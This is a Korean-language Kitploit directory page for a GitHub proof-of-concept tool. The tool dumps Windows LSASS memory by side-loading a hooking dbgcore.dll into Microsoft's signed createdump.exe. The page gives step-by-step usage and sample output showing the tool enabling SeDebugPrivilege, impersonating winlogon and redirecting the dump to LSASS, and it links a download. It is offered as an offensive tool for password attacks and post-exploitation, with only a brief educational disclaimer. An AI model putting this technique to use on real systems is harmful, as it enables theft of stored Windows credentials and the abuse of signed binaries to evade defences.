Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
createdump — Leverage WindowsApp createdump tool to obtain an lsass dump | Kitploit
도구/GitHubGitHub/rweijnen/createdump
Password AttacksImpersonation ToolsPost-ExploitationRed Teaming
GitHubrweijnen/createdump

createdump

Leverage WindowsApp createdump tool to obtain an lsass dump

저장소 보기
151201년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Windows App Windows App LSASS 덤프 - 개념 증명

이 프로젝트는 Windows App에서 Microsoft 서명 실행 파일인 createdump.exe 도구를 사용하여 LSASS 프로세스를 덤프하는 방법을 시연하며, 커스텀 후크를 활용하여 LSASS에 대한 프로세스 액세스를 활성화합니다.

root@kitploit:~
Get-AuthentiCodeSignature -FilePath (Join-Path -Path (Get-AppxPackage -Name *Windows365*).InstallLocation -ChildPath 'wnc\createdump.exe')

    Directory: C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc

SignerCertificate                         Status                                       StatusMessage                               Path
-----------------                         ------                                       -------------                               ----
C2048FB509F1C37A8C3E9EC6648118458AA01780  Valid                                        Signature verified.                         createdump.exe

사용 방법

  1. WindowsApp 폴더에서 원하는 폴더로 createdump를 복사합니다 (copy C:\Program Files\WindowsApps\MicrosoftCorporationII.Windows365_2.0.285.0_x64__8wekyb3d8bbwe\wnc\createdump.exe .)
  2. 이 리포지토리의 dbgcore.dll을 같은 폴더에 넣습니다
  3. createdump를 실행합니다 (선택적으로 매개변수를 제공할 수 있음)

참고: 관리자 권한이 필요합니다.

출력은 대략 다음과 같아야 합니다:

root@kitploit:~
c:\work\_createdump>createdump.exe
WindowsApp PoC by Remko Weijnen
(ab)uses createdump tool from "The WindowsApp" to create an LSASS dump

Successfully hooked OpenProcess
OpenProcess called
Attempting to enable SeDebugPrivilege...
SeDebugPrivilege successfully enabled!
Attempting to impersonate winlogon...
Successfully impersonated winlogon
[createdump] Writing minidump with heap for process 35828 to file C:\Users\me\AppData\Local\Temp\dump.35828.dmp
MiniDumpWriteDump called with:
  ProcessId: 35828
  hProcess: 0x0000000000000184
  hFile: 0x00000000000001BC
  DumpType: 0x41a25
ProcessId changed to LSASS (PID: 1512)
Loaded DbgHelp.dll from: C:\Windows\System32\DbgCore.dll
Calling original with:
  ProcessId: 1512
  hProcess: 0x0000000000000184
  hFile: 0x00000000000001BC
  DumpType: 0x41026
MiniDumpWriteDump result: Success
[createdump] Dump successfully written in 270ms
DLL unloading, hooks removed.

면책 조항

이 프로젝트는 교육 목적으로만 제공됩니다. 이 도구를 오용하면 개인정보 보호 및 보안 정책을 위반할 수 있습니다.

도구 다운로드